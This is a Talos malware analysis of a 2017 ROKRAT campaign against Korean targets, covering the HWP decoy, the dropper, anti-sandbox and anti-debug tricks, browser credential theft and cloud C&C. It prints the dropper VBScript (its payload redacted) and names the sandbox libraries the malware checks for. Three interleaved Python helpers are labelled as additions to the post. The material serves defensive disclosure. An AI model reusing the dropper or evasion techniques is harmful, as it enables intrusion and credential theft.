ROKRAT Reloaded
Talos blog (Paul Rascagneres), published Nov 27, 2017 - 9:52 p.m.; syndicated via feedproxy.google.com; Vulners id TALOSBLOG:52B6D17B9E11E344D5E57299287AAE60

<div>This post was authored by <a href="https://www.twitter.com/SecurityBeard/">Warren Mercer</a>, <a href="https://www.twitter.com/r00tbsd">Paul Rascagneres</a> and with contributions from Jungsoo An.</div><div><br /></div><h2>Executive Summary</h2><br />Earlier this year, Talos published two articles concerning South Korean threats. The <a href="http://blog.talosintelligence.com/2017/02/korean-maldoc.html">first one</a> was about the use of a malicious HWP document which dropped downloaders used to retrieve malicious payloads from several compromised websites. One of the websites was a compromised government website. We named this case "Evil New Years". The <a href="http://blog.talosintelligence.com/2017/04/introducing-rokrat.html">second one</a> was about the analysis and discovery of the ROKRAT malware.<br /><br />This month, Talos discovered a new ROKRAT version. This version contains technical elements that link the two previous articles. This new sample contains code from the two publications earlier this year:<br /><br /><ul><li>It contains the same reconnaissance code;</li><li>It uses a PDB path pattern similar to the one in the "Evil New Years" samples;</li><li>It contains the same cloud features and similar copy-paste methods that ROKRAT used;</li><li>It uses cloud platforms as C&C, but not exactly the same ones. This version uses pCloud, Box, Dropbox and Yandex.</li></ul><br /><br />We also discovered that this new version of ROKRAT shares code with Freenki, a downloader used in the FreeMilk campaign.<br /><br />The campaign started, unsurprisingly, with a malicious HWP document. This document was alleged to be written by a lawyer who claims to represent the "Citizens' Alliance for North Korean Human Rights and Reunification of Korean Peninsula". It mentions a meeting of this group that took place on the 1st of November in Seoul.
Due to the content of this malicious document, we can assume that the targets are interested in the situation in North Korea. This malicious document drops and executes a new version of ROKRAT.<br /><br /><h2>HWP Malicious Document</h2><br />As with the previous ROKRAT campaigns we described, the infection vector used by this actor is a malicious HWP document. HWP files are created with Hangul Word Processor, a popular alternative to Microsoft Office for South Korean users, developed by Hancom. Here is a screenshot of the malicious document:<br /><div><a href="https://2.bp.blogspot.com/-oZY_XkhLCak/WhyBjcvv1DI/AAAAAAAAAMY/EtxUBxnlW0I7Zw5dvU4cVLCmMy3vVYzEwCLcBGAs/s1600/image7.png"><img height="640" src="https://2.bp.blogspot.com/-oZY_XkhLCak/WhyBjcvv1DI/AAAAAAAAAMY/EtxUBxnlW0I7Zw5dvU4cVLCmMy3vVYzEwCLcBGAs/s640/image7.png" width="426" /></a></div><br />The malicious document mentions the "Community of North Korean human right and unification". We first observed this campaign during November 2017. The document was alleged to be written by a lawyer who has been representing the community known as '올인통 (올바른북한인권법과통일을위한시민모임)'.<br /><br />The purpose of the document is to arrange a meeting to discuss items related to the 'North Korean Human Rights Act' and the 'Enactment of a law' which passed in 2016 in South Korea.<br /><br />Based on the meeting date (1st Nov 2017), this decoy document could have been delivered to the stakeholders in the community '올인통' before November 2017, pretending to be a request to join the discussion on finding better ideas/ways to get more people interested in their activity.<br /><br />The HWP file contains an OLE object named BIN0001.OLE.
Once extracted and uncompressed (zlib), we obtain the following script:<br /><pre>const strEncode = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hV[…redacted…]AAAAAAAAAAAAAAAAAAAAAA="<br />DIM outFile<br />DIM base64Decoded<br />DIM shell_obj<br />SET shell_obj = CreateObject("WScript.Shell")<br />DIM fso<br />SET fso = CreateObject("Scripting.FileSystemObject")<br />outFile = "c:\ProgramData\HncModuleUpdate.exe"<br />base64Decoded = decodeBase64(strEncode)<br />IF NOT(fso.FileExists(outFile)) then<br />writeBytes outFile, base64Decoded<br />shell_obj.run outFile<br />END IF<br />WScript.Quit()<br />private function decodeBase64(base64)<br />DIM DM, EL<br />SET DM = CreateObject("Microsoft.XMLDOM")<br />SET EL = DM.createElement("tmp")<br />EL.DataType = "bin.base64"<br />EL.Text = base64<br />decodeBase64 = EL.NodeTypedValue<br />end function<br />private Sub writeBytes(file, bytes)<br />DIM binaryStream<br />SET binaryStream = CreateObject("ADODB.Stream")<br />binaryStream.Type = 1<br />binaryStream.Open<br />binaryStream.Write bytes<br />binaryStream.SaveToFile file, 1<br />End Sub<br /></pre>The purpose of the script is to base64-decode the content of the strEncode variable. The decoded data is written to the file c:\ProgramData\HncModuleUpdate.exe and executed. The binary is the ROKRAT dropper. The specific filename 'HncModuleUpdate' may fool a user into thinking this is Hancom software.<br /><br /><h2>Stage 1: Dropper</h2><br />The purpose of the dropper is to extract the resource named SBS. This resource contains malicious shellcode. The dropper then starts a new cmd.exe process, injects the extracted resource into it and executes it.
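As an added example (not code from the Talos post), the following Python script performs the triage step described above for the extracted BIN0001.OLE stream: inflate it, locate the strEncode assignment, base64-decode the embedded file, and record the drop path, the MZ check and a SHA256 of what would have been written to disk. The input stream is constructed here to have the same shape as the script above; the header-less deflate fallback is an assumption about how HWP stores BinData streams.

```python
"""Triage helper for the HWP BinData stream described above.

The OLE object inside the HWP file is a compressed stream; inflated, it is
the VBScript that base64-decodes an embedded PE and writes it to disk. This
script inflates the stream, pulls the base64 blob out of the strEncode
assignment, decodes it and reports the drop path, the MZ check and the SHA256
of the embedded file. Added example: the sample stream below is constructed
to have the shape of the script in the post, not taken from the document.
"""
import base64
import hashlib
import re
import zlib

# Tolerate straight or typographic quotes, which blog rendering often swaps in.
_B64_RE = re.compile(r'strEncode\s*=\s*["\u201c]([A-Za-z0-9+/=]+)["\u201d]')
_OUT_RE = re.compile(r'outFile\s*=\s*["\u201c]([^"\u201d]+)["\u201d]', re.IGNORECASE)


def inflate_stream(raw: bytes) -> str:
    """Inflate the stream. HWP BinData is commonly stored as header-less deflate
    (assumption), so fall back to wbits=-15 when there is no zlib header."""
    try:
        data = zlib.decompress(raw)
    except zlib.error:
        data = zlib.decompress(raw, -15)
    return data.decode("latin-1")


def extract_payload(script: str) -> dict:
    """Return the drop path, decoded payload size, MZ check and SHA256."""
    b64 = _B64_RE.search(script)
    if not b64:
        raise ValueError("no strEncode assignment found in script")
    payload = base64.b64decode(b64.group(1))
    out = _OUT_RE.search(script)
    return {
        "drop_path": out.group(1) if out else None,
        "size": len(payload),
        "is_pe": payload[:2] == b"MZ",
        "sha256": hashlib.sha256(payload).hexdigest(),
    }


def triage(raw_stream: bytes) -> dict:
    """Inflate the stream, then extract and describe the embedded file."""
    return extract_payload(inflate_stream(raw_stream))


def raw_deflate(data: bytes) -> bytes:
    """Header-less deflate, used only to build the second constructed sample."""
    c = zlib.compressobj(wbits=-15)
    return c.compress(data) + c.flush()


# Constructed sample: a minimal MZ/PE-looking blob inside the same script shape.
FAKE_PE = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 40
SAMPLE_SCRIPT = (
    'const strEncode = "%s"\n'
    "DIM outFile\n"
    'outFile = "c:\\ProgramData\\HncModuleUpdate.exe"\n'
    "base64Decoded = decodeBase64(strEncode)\n"
) % base64.b64encode(FAKE_PE).decode()
SAMPLE_STREAM = zlib.compress(SAMPLE_SCRIPT.encode())      # zlib-wrapped form
SAMPLE_STREAM_RAW = raw_deflate(SAMPLE_SCRIPT.encode())    # header-less form

if __name__ == "__main__":
    for key, value in triage(SAMPLE_STREAM).items():
        print(f"{key}: {value}")
```

The regular expressions deliberately accept typographic quotes as well as straight ones, because scripts copied out of a rendered blog post (as above) often arrive with the quotes replaced; the SHA256 of the decoded payload is what you compare against the IOC list at the end of this post.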
The code injection is performed with the VirtualAlloc(), WriteProcessMemory() and CreateRemoteThread() APIs:<br /><div><a href="https://4.bp.blogspot.com/-UK3O08XFp2k/WhyBximnWLI/AAAAAAAAAMc/s5N3fKQB__ks4xpcTOH6GtWfOMVzQS_TwCLcBGAs/s1600/image6.png"><img height="640" src="https://4.bp.blogspot.com/-UK3O08XFp2k/WhyBximnWLI/AAAAAAAAAMc/s5N3fKQB__ks4xpcTOH6GtWfOMVzQS_TwCLcBGAs/s640/image6.png" width="508" /></a></div><br />Once executed, the shellcode decodes a PE file, loads it into the memory of cmd.exe and finally executes it. This payload is a new variant of ROKRAT.<br /><br />Additionally, one of the analysed droppers displays a picture to the user:<br /><div><a href="https://2.bp.blogspot.com/-UdRh6pJR0FU/WhyB6um-i6I/AAAAAAAAAMg/Rujz_rpXM8AIMWxHayfmA7v0sdKxbxYawCLcBGAs/s1600/image20.png"><img height="353" src="https://2.bp.blogspot.com/-UdRh6pJR0FU/WhyB6um-i6I/AAAAAAAAAMg/Rujz_rpXM8AIMWxHayfmA7v0sdKxbxYawCLcBGAs/s400/image20.png" width="400" /></a></div><br />The people in the pictures relate to the Korean War and to the independence troops of the "independence movement". The image on the top left comes from <a href="https://ko.wikipedia.org/wiki/백선엽">Wikipedia</a>. The picture in the middle left comes from <a href="http://m.blog.daum.net/_blog/_m/articleView.do?blogid=0UCYA&amp;articleno=1545">this blog</a>. And the bottom left image comes from this <a href="http://m.ohmynews.com/NWS_Web/Mobile/at_pg.aspx?CNTN_CD=A0000939170#cb">news website</a>. The decoy image appears to be a set of public pictures.<br /><br /><h2>Stage 2: ROKRAT</h2><h3>Similarities With the "Evil New Years" MalDoc</h3><br />This variant of ROKRAT contains code similar to the "Evil New Years" downloader. The information collected during the reconnaissance phase is similar. The malware uses the following registry key to get the machine type: HKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosData.
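An added example (not code from the post): a parser for the SMBiosData registry blob referenced above. That value has the same layout as the buffer GetSystemFirmwareTable returns for the 'RSMB' provider: an 8-byte header followed by the raw SMBIOS structure table. The parser resolves the Type 1 (System Information) manufacturer string and the Type 3 (System Enclosure) chassis type, which are the two fields the reconnaissance code keys on, and it maps the chassis code with the complete DMTF 2.7.0 enclosure table rather than the subset the malware carries (the later part of this post shows which values the malware omits). The sample blob is constructed, not dumped from a real machine; the script is useful when checking what an analysis VM or sandbox image reports to this kind of fingerprinting.

```python
"""Parser for the SMBiosData registry blob ROKRAT reads for host fingerprinting.

The value HKLM\\SYSTEM\\CurrentControlSet\\Services\\mssmbios\\Data\\SMBiosData
has the same layout as the GetSystemFirmwareTable('RSMB') buffer: an 8-byte
header (Used20CallingMethod, major, minor, DMI revision, DWORD table length)
followed by the raw SMBIOS structure table. Each structure is a formatted area
(type, length, handle, fields) followed by NUL-terminated strings and a final
NUL. Added example; the blob below is constructed, not dumped from a machine.
"""
import struct

# DMTF SMBIOS 2.7.0 "System Enclosure or Chassis Types" (Type 3, offset 5, bits 6:0).
CHASSIS_TYPES = {
    0x01: "Other", 0x02: "Unknown", 0x03: "Desktop", 0x04: "Low Profile Desktop",
    0x05: "Pizza Box", 0x06: "Mini Tower", 0x07: "Tower", 0x08: "Portable",
    0x09: "Laptop", 0x0A: "Notebook", 0x0B: "Hand Held", 0x0C: "Docking Station",
    0x0D: "All in One", 0x0E: "Sub Notebook", 0x0F: "Space-saving",
    0x10: "Lunch Box", 0x11: "Main Server Chassis", 0x12: "Expansion Chassis",
    0x13: "SubChassis", 0x14: "Bus Expansion Chassis", 0x15: "Peripheral Chassis",
    0x16: "RAID Chassis", 0x17: "Rack Mount Chassis", 0x18: "Sealed-case PC",
    0x19: "Multi-system chassis", 0x1A: "Compact PCI", 0x1B: "Advanced TCA",
    0x1C: "Blade", 0x1D: "Blade Enclosure",
}


def iter_structures(table: bytes):
    """Yield (type, formatted_area, strings) for each structure in the table."""
    off = 0
    while off + 4 <= len(table):
        stype, length, _handle = struct.unpack_from("<BBH", table, off)
        formatted = table[off:off + length]
        pos, strings = off + length, []
        while True:                      # string-set: "s1\0s2\0\0", or "\0\0" if empty
            end = table.index(b"\x00", pos)
            if end == pos:
                break
            strings.append(table[pos:end].decode("ascii", "replace"))
            pos = end + 1
        off = end + 1 if strings else end + 2
        yield stype, formatted, strings
        if stype == 127:                 # End-of-Table structure
            break


def string_ref(formatted: bytes, strings: list, offset: int) -> str:
    """Resolve the 1-based string index stored at `offset` of the formatted area."""
    idx = formatted[offset] if offset < len(formatted) else 0
    return strings[idx - 1] if 0 < idx <= len(strings) else ""


def fingerprint(blob: bytes) -> dict:
    """Extract the fields the reconnaissance code uses from a SMBiosData blob."""
    _used20, major, minor, _dmi, length = struct.unpack_from("<BBBBI", blob, 0)
    info = {"smbios_version": f"{major}.{minor}", "manufacturer": "", "chassis": ""}
    for stype, formatted, strings in iter_structures(blob[8:8 + length]):
        if stype == 1:                                   # System Information
            info["manufacturer"] = string_ref(formatted, strings, 4)
            info["product"] = string_ref(formatted, strings, 5)
        elif stype == 3:                                 # System Enclosure
            code = formatted[5] & 0x7F                   # bit 7 is the chassis-lock flag
            info["chassis_code"] = code
            info["chassis"] = CHASSIS_TYPES.get(code, "Other")
    return info


def build_structure(stype: int, handle: int, fields: list, strings: list) -> bytes:
    """Assemble one SMBIOS structure; used only to build the constructed sample."""
    formatted = struct.pack("<BBH", stype, 4 + len(fields), handle) + bytes(fields)
    strtab = b"".join(s.encode() + b"\x00" for s in strings) + b"\x00"
    return formatted + (strtab if strings else b"\x00\x00")


# Constructed sample table: Type 1, Type 3 (Notebook, lock bit set), End-of-Table.
SAMPLE_TABLE = (
    build_structure(1, 0x0100, [1, 2, 3, 4] + [0] * 16,
                    ["ExampleVendor", "VM Model", "1.0", "SN-CONSTRUCTED"])
    + build_structure(3, 0x0300, [1, 0x0A | 0x80, 0, 0, 0], ["ExampleVendor"])
    + build_structure(127, 0xFEFF, [], [])
)
SAMPLE_BLOB = struct.pack("<BBBBI", 0, 2, 7, 0, len(SAMPLE_TABLE)) + SAMPLE_TABLE

if __name__ == "__main__":
    print(fingerprint(SAMPLE_BLOB))
```

Reading the real value is a single RegQueryValueEx call on Windows (or `reg query` of the same path); the point of the parser is the structure walk, in particular that string fields are indices into the string set that follows each formatted area, and that the chassis "Type" byte carries a lock flag in bit 7 that must be masked before the lookup.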
The "System manufacturer" value is used to identify the type of machine. Here is the control-flow graph of the "Evil New Years" downloader:<br /><div><a href="https://4.bp.blogspot.com/-ThSGoJ2fiL8/WhyCFM6M3SI/AAAAAAAAAMo/kS5m9vVHIhUAhkMPEhb-YiPH5-WISQ0hgCLcBGAs/s1600/image10.png"><img height="452" src="https://4.bp.blogspot.com/-ThSGoJ2fiL8/WhyCFM6M3SI/AAAAAAAAAMo/kS5m9vVHIhUAhkMPEhb-YiPH5-WISQ0hgCLcBGAs/s640/image10.png" width="640" /></a></div><br />The control-flow graph of the ROKRAT variant:<br /><div><a href="https://2.bp.blogspot.com/-sshO1piH2Z4/WhyCKaO_YUI/AAAAAAAAAMs/T-ioks5MAWQP9yqvUiBKHLO88h3IIGBQgCLcBGAs/s1600/image13.png"><img height="450" src="https://2.bp.blogspot.com/-sshO1piH2Z4/WhyCKaO_YUI/AAAAAAAAAMs/T-ioks5MAWQP9yqvUiBKHLO88h3IIGBQgCLcBGAs/s640/image13.png" width="640" /></a></div><br />The two graphs are 99% similar. Additionally, the machine type is described with the following strings:<br /><div><a href="https://4.bp.blogspot.com/-P3vttCd3--8/WhyCQUU2stI/AAAAAAAAAMw/yqLRBtpi1DUNwbOJ8WiPWn9nC3rtishggCLcBGAs/s1600/image8.png"><img height="254" src="https://4.bp.blogspot.com/-P3vttCd3--8/WhyCQUU2stI/AAAAAAAAAMw/yqLRBtpi1DUNwbOJ8WiPWn9nC3rtishggCLcBGAs/s640/image8.png" width="640" /></a></div><br />The code appears to be based on this <a href="http://www.rohitab.com/discuss/topic/35915-win32-api-to-get-system-information/?p%3D10075283">forum</a> post describing the Win32 APIs used.
The source code only considers the following types:<br /><pre>default: lpString = "(Other)"; break;<br />case 0x02: lpString = "(Unknown)"; break;<br />case 0x03: lpString = "(Desktop)"; break;<br />case 0x04: lpString = "(Low Profile Desktop)"; break;<br />case 0x06: lpString = "(Mini Tower)"; break;<br />case 0x07: lpString = "(Tower)"; break;<br />case 0x08: lpString = "(Portable)"; break;<br />case 0x09: lpString = "(Laptop)"; break;<br />case 0x0A: lpString = "(Notebook)"; break;<br />case 0x0E: lpString = "(Sub Notebook)"; break;<br /></pre>Notice the parentheses, which the ROKRAT author uses too. Some values are ignored, as we can see from the <a href="http://www.dmtf.org/sites/default/files/standards/documents/DSP0134_2.7.0.pdf">SMBIOS documentation</a>:<br /><div><a href="https://2.bp.blogspot.com/-0Ere0jsIaBM/WhyCWDThHsI/AAAAAAAAAM0/hGb9Yd4MiZ85bo8q1mlGuZ8VzRrFI690wCLcBGAs/s1600/image19.png"><img height="640" src="https://2.bp.blogspot.com/-0Ere0jsIaBM/WhyCWDThHsI/AAAAAAAAAM0/hGb9Yd4MiZ85bo8q1mlGuZ8VzRrFI690wCLcBGAs/s640/image19.png" width="478" /></a></div><br />The missing values are also omitted from the forum post.<br /><br />Another similarity is the PDB path. The "Evil New Years" sample contained the following PDB path:<br /><ul><li><pre>e:\Happy\Work\Source\version 12\T+M\Result\DocPrint.pdb</pre></li></ul>This new ROKRAT variant contains the following PDB path:<br /><ul><li><pre>d:\HighSchool\version 13\2ndBD\T+M\T+M\Result\DocPrint.pdb</pre></li></ul>The pattern is clearly similar.<br /><h3>Anti-Sandbox</h3><br />This ROKRAT variant contains anti-sandbox tricks.
This is performed by checking whether the following libraries are loaded:<br /><br /><ul><li>SbieDll.dll (Sandboxie library)</li><li>Dbghelp.dll (Microsoft debugging tools)</li><li>Api_log.dll (ThreatAnalyzer / GFI SandBox)</li><li>Dir_watch.dll (ThreatAnalyzer / GFI SandBox)</li></ul><div><a href="https://3.bp.blogspot.com/-tMpcUMOjVY4/WhyCeLjiTtI/AAAAAAAAAM4/55qQDK6rByglGRQeSmTpw6kLM3ksCkJ9QCLcBGAs/s1600/image4.png"><img height="374" src="https://3.bp.blogspot.com/-tMpcUMOjVY4/WhyCeLjiTtI/AAAAAAAAAM4/55qQDK6rByglGRQeSmTpw6kLM3ksCkJ9QCLcBGAs/s640/image4.png" width="640" /></a></div><h3>Anti-Debug</h3><br />This ROKRAT version contains anti-debug tricks. For example, it uses the following NOP technique:<br /><div><a href="https://2.bp.blogspot.com/--2thdwNFFWk/WhyCxluop1I/AAAAAAAAANA/ZvScFYWEfmEX8V0XKU8Ab3e6RR9Nl3vFACLcBGAs/s1600/image5.png"><img height="438" src="https://2.bp.blogspot.com/--2thdwNFFWk/WhyCxluop1I/AAAAAAAAANA/ZvScFYWEfmEX8V0XKU8Ab3e6RR9Nl3vFACLcBGAs/s640/image5.png" width="640" /></a></div><br />nop dword ptr [eax+eax+00h] is a 5-byte NOP: 0x0F1F440000. This opcode is not correctly supported by Immunity Debugger, so the instruction is shown as "???" in red in the screenshot:<br /><div><a href="https://1.bp.blogspot.com/-FOQkjTQlNvA/WhyC3zsnVTI/AAAAAAAAANE/WmpI7gwqSBM75SG_ls-3cHjVzcKC50JTgCLcBGAs/s1600/image2.png"><img height="322" src="https://1.bp.blogspot.com/-FOQkjTQlNvA/WhyC3zsnVTI/AAAAAAAAANE/WmpI7gwqSBM75SG_ls-3cHjVzcKC50JTgCLcBGAs/s640/image2.png" width="640" /></a></div><h3>Screenshots Feature</h3><br />Both ROKRAT versions take screenshots. It is interesting to note the similarities between the two versions.
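The 5-byte NOP from the anti-debug section above, as an added example (not code from the post): a small length decoder for the 0F 1F /0 NOP family that shows why 0F 1F 44 00 00 occupies five bytes (ModRM 0x44 selects a SIB byte and an 8-bit displacement), and why a disassembler that stops at the opcode mis-sizes the instruction and desynchronises on the bytes that follow. The decoder handles only this NOP family with an optional operand-size prefix, not general x86, and the byte sequence scanned at the end is constructed.

```python
"""Length decoder for the 0F 1F multi-byte NOP family used as an anti-debug trick.

`nop dword ptr [eax+eax*1+0]` is 0F 1F 44 00 00: opcode 0F 1F, ModRM 0x44
(mod=01, reg=/0, rm=100 -> SIB byte follows, disp8 follows), SIB 0x00
([eax+eax*1]) and a one-byte displacement. A disassembler that does not
decode the ModRM/SIB/displacement for this opcode mis-sizes the instruction
and desynchronises on the following bytes, which is what the Immunity
screenshot shows. Added example, not code from the post; 32-bit addressing
is assumed and only 0F 1F /0 (with optional 0x66 prefix) is recognised.
"""


def nop_length(buf: bytes, i: int = 0) -> int:
    """Return the length of the multi-byte NOP at buf[i], or 0 if the bytes
    there are not a complete 0F 1F /0 NOP."""
    n = 0
    if i < len(buf) and buf[i] == 0x66:           # operand-size prefix: nop word ptr
        n += 1
    if buf[i + n:i + n + 2] != b"\x0f\x1f":
        return 0
    n += 2
    if i + n >= len(buf):
        return 0
    modrm = buf[i + n]
    mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
    if reg != 0:                                  # only the /0 form is a NOP
        return 0
    n += 1
    if mod == 3:                                  # register operand, no memory address
        return n
    if rm == 4:                                   # SIB byte present
        if i + n >= len(buf):
            return 0
        sib_base = buf[i + n] & 7
        n += 1
        if mod == 0 and sib_base == 5:            # [index*scale + disp32]
            n += 4
    elif mod == 0 and rm == 5:                    # [disp32]
        n += 4
    if mod == 1:                                  # disp8
        n += 1
    elif mod == 2:                                # disp32
        n += 4
    return n if i + n <= len(buf) else 0          # truncated at end of buffer


def find_nops(buf: bytes) -> list:
    """Linear byte sweep reporting (offset, length) of each 0F 1F NOP found.
    This is not a disassembly: it can match inside other instructions, so treat
    hits as candidates to confirm in the real listing."""
    hits, i = [], 0
    while i < len(buf):
        n = nop_length(buf, i)
        if n:
            hits.append((i, n))
            i += n
        else:
            i += 1
    return hits


# Constructed sample: 5-byte NOP, xor eax,eax, 3-byte NOP, ret.
SAMPLE = bytes.fromhex("0f1f44000033c00f1f00c3")

if __name__ == "__main__":
    print(find_nops(SAMPLE))
```

The same ModRM/SIB rules give the other canonical lengths Intel documents for this family (0F 1F 00 is three bytes, 0F 1F 40 00 four, 0F 1F 80 00 00 00 00 seven, and 66 0F 1F 84 00 00 00 00 00 nine), which is a quick sanity check for any disassembler you rely on during analysis.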
In particular, the filename of the saved screenshot is built the same way. Here is the April ROKRAT version:<br /><div><a href="https://2.bp.blogspot.com/-9U3juJSttOw/WhyC_xXCS7I/AAAAAAAAANI/QFDm3a7rfxQcmAM_ly8YHcSBuD4WW6FegCLcBGAs/s1600/image17.png"><img height="640" src="https://2.bp.blogspot.com/-9U3juJSttOw/WhyC_xXCS7I/AAAAAAAAANI/QFDm3a7rfxQcmAM_ly8YHcSBuD4WW6FegCLcBGAs/s640/image17.png" width="488" /></a></div><br />And the code of the November version:<br /><div><a href="https://1.bp.blogspot.com/--n6yXqONkEs/WhyDFe5MlnI/AAAAAAAAANM/3XsNWR3OdBUI3VK6FQLIhAGsopYx4WT5ACLcBGAs/s1600/image11.png"><img height="586" src="https://1.bp.blogspot.com/--n6yXqONkEs/WhyDFe5MlnI/AAAAAAAAANM/3XsNWR3OdBUI3VK6FQLIhAGsopYx4WT5ACLcBGAs/s640/image11.png" width="640" /></a></div><br />The pattern is exactly the same: %s%04X%04X.tmp. The two %04X are random values, and the %s is a temporary path (obtained with GetTempPath()). In both samples, the string length is 0x12C (300). This part is clearly a copy-paste.<br /><h3>Browser Password Stealer</h3><br />One of the analysed November ROKRAT samples contained a browser credential stealing capability. The malware is able to extract the stored passwords from Internet Explorer, Chrome and Firefox. For Chrome and Firefox, the malware queries the SQLite database containing the URL, username and password:<br /><div><a href="https://2.bp.blogspot.com/-1c4E_cI5198/WhyDL5Xq05I/AAAAAAAAANQ/pkyAlBQDvAgq3n9AX1XpGuRd8uLEQhbVACLcBGAs/s1600/image3.png"><img height="276" src="https://2.bp.blogspot.com/-1c4E_cI5198/WhyDL5Xq05I/AAAAAAAAANQ/pkyAlBQDvAgq3n9AX1XpGuRd8uLEQhbVACLcBGAs/s640/image3.png" width="640" /></a></div><br />Additionally, ROKRAT supports the Microsoft Vault mechanism. Vault was introduced in Windows 7; it stores sensitive data (such as credentials) for Internet Explorer.
Here is the initialization of the Vault APIs:<br /><div><a href="https://2.bp.blogspot.com/-kgM45XXgNKw/WhyDSVHJD5I/AAAAAAAAANY/y18ZaMeY3XAiJJt0c2qUT88YUc-HQfPtACLcBGAs/s1600/image14.png"><img height="640" src="https://2.bp.blogspot.com/-kgM45XXgNKw/WhyDSVHJD5I/AAAAAAAAANY/y18ZaMeY3XAiJJt0c2qUT88YUc-HQfPtACLcBGAs/s640/image14.png" width="390" /></a></div><br />The ROKRAT implementation is largely based on the <a href="https://www.codeproject.com/Articles/1167943/The-Secrets-of-Internet-Explorer-Credentials">following project</a>. This is a change of tactic for ROKRAT compared with previous samples/versions. This time the actor is specifically targeting information which could be used for additional compromises, possibly including personal accounts. The method used by the ROKRAT actors was also out of the ordinary, as they embedded the whole SQLite library into their executable to support the SQLite queries used for Firefox and Google Chrome.<br /><br />During our investigation, we discovered that the browser password stealer code is exactly the same as the code used during the <a href="https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/">FreeMilk</a> campaign described by Unit 42. In that article, the author had already noticed C2 infrastructure overlap between FreeMilk and ROKRAT. In addition, we can add that some code overlap is present between the two samples:<br /><div><a href="https://1.bp.blogspot.com/-wgeOLIL7OBQ/WhyDX-7egxI/AAAAAAAAANc/bj86udF7beAhD0Q3kWPDDLsJPNjWn-FBwCLcBGAs/s1600/image12.png"><img height="408" src="https://1.bp.blogspot.com/-wgeOLIL7OBQ/WhyDX-7egxI/AAAAAAAAANc/bj86udF7beAhD0Q3kWPDDLsJPNjWn-FBwCLcBGAs/s640/image12.png" width="640" /></a></div><br />On the left, we have the ROKRAT sample and on the right the FreeMilk sample.
We can notice that, in addition to the code, the author copy-pasted English typos such as "IE Registery".<br /><h3>Cloud Platforms Used As C&C</h3><br />Finally, this ROKRAT version uses cloud platforms in exactly the same way as in our previous analysis. This time, the author did not use social network platforms, but different cloud providers:<br /><br /><ul><li><h4>pCloud</h4></li></ul><div><a href="https://3.bp.blogspot.com/-PrgljjxiAFo/WhyEcoSdFdI/AAAAAAAAAN4/bdK6iwGJ8moRLm9NDzv_5CVZx82QlV0NQCLcBGAs/s1600/image18.png"><img height="640" src="https://3.bp.blogspot.com/-PrgljjxiAFo/WhyEcoSdFdI/AAAAAAAAAN4/bdK6iwGJ8moRLm9NDzv_5CVZx82QlV0NQCLcBGAs/s640/image18.png" width="550" /></a></div><br /><br /><ul><li><h4>Box</h4></li></ul><div><a href="https://1.bp.blogspot.com/-mEPlwuN1nzk/WhyEywpiFYI/AAAAAAAAAOA/WJFSGK8Ylp8IQE6Vru-WMQWd57IGHsBkwCLcBGAs/s1600/image15.png"><img height="294" src="https://1.bp.blogspot.com/-mEPlwuN1nzk/WhyEywpiFYI/AAAAAAAAAOA/WJFSGK8Ylp8IQE6Vru-WMQWd57IGHsBkwCLcBGAs/s640/image15.png" width="640" /></a></div><div><br /></div><ul><li><h4>Dropbox</h4></li></ul><div><a href="https://3.bp.blogspot.com/-DFU-dyBrdNg/WhyFAJdvf6I/AAAAAAAAAOM/oP6_ri4qfBQZa3-1tuSvysODAQyRZT73gCLcBGAs/s1600/image9.png"><img height="458" src="https://3.bp.blogspot.com/-DFU-dyBrdNg/WhyFAJdvf6I/AAAAAAAAAOM/oP6_ri4qfBQZa3-1tuSvysODAQyRZT73gCLcBGAs/s640/image9.png" width="640" /></a></div><ul><li><h4>Yandex</h4></li></ul><div><a href="https://4.bp.blogspot.com/-obpjJED7PA8/WhyFL04Jk0I/AAAAAAAAAOQ/5c1siYoQcdAt8UgR9YIuTXiawtZlN1DhACLcBGAs/s1600/image16.png"><img height="276" src="https://4.bp.blogspot.com/-obpjJED7PA8/WhyFL04Jk0I/AAAAAAAAAOQ/5c1siYoQcdAt8UgR9YIuTXiawtZlN1DhACLcBGAs/s640/image16.png" width="640" /></a></div><div><br /></div><h2>Conclusion</h2><br />This campaign shows that the actor behind ROKRAT is still active. Based on the PDB path, it could be the 13th version of this malware.
This actor made the decision to use only legitimate cloud platforms, but changed some of them since the last incarnation. From an attacker's perspective it is an interesting choice: the traffic is encrypted by default with HTTPS, and the malicious traffic can be difficult to spot in the middle of legitimate traffic to these platforms. We can also determine that the actor likes to use code already available on the internet, in the various repositories we mentioned throughout this post, i.e. GitHub, Code Project and other public forums.<br /><br />Based on source code copy-paste, we remain highly confident that the author of ROKRAT is also behind, or working with those behind, the FreeMilk spear phishing campaign. This is further proven by the fact that ROKRAT shares code with the Freenki downloader used in the FreeMilk campaign.<br /><br />Moreover, the actor is always interested in the same pattern of targets: the decoy documents refer to precise elements related to the geopolitical situation between North and South Korea. Generally, the documents reference the Ministry of Unification or the situation of North Korean citizens.
They frequently contain specific references to real meetings or conferences, showing a deep knowledge of current events in North and South Korea.<br /><br />Together, this information helps us to understand the profile of the targeted systems and the interests of the threat actor.<br /><br /><h2>Coverage</h2><br />Additional ways our customers can detect and block this threat are listed below.<br /><div><a href="https://3.bp.blogspot.com/-h3Ubgz2tpKo/WhyDpf-abzI/AAAAAAAAANk/QXJs9157NFcro7ZHWf36KsfFiQ2yjgazgCLcBGAs/s1600/image1.png"><img src="https://3.bp.blogspot.com/-h3Ubgz2tpKo/WhyDpf-abzI/AAAAAAAAANk/QXJs9157NFcro7ZHWf36KsfFiQ2yjgazgCLcBGAs/s1600/image1.png" /></a></div>Advanced Malware Protection (<a href="https://www.cisco.com/c/en/us/products/security/advanced-malware-protection">AMP</a>) is ideally suited to prevent the execution of the malware used by these threat actors.<br /><br /><a href="https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html">CWS</a> or <a href="https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html">WSA</a> web scanning prevents access to malicious websites and detects malware used in these attacks.<br /><br /><a href="https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html">Email Security</a> can block malicious emails sent by threat actors as part of their campaign.<br /><br />Network Security appliances such as <a href="https://www.cisco.com/c/en/us/products/security/firewalls/index.html">NGFW</a>, <a 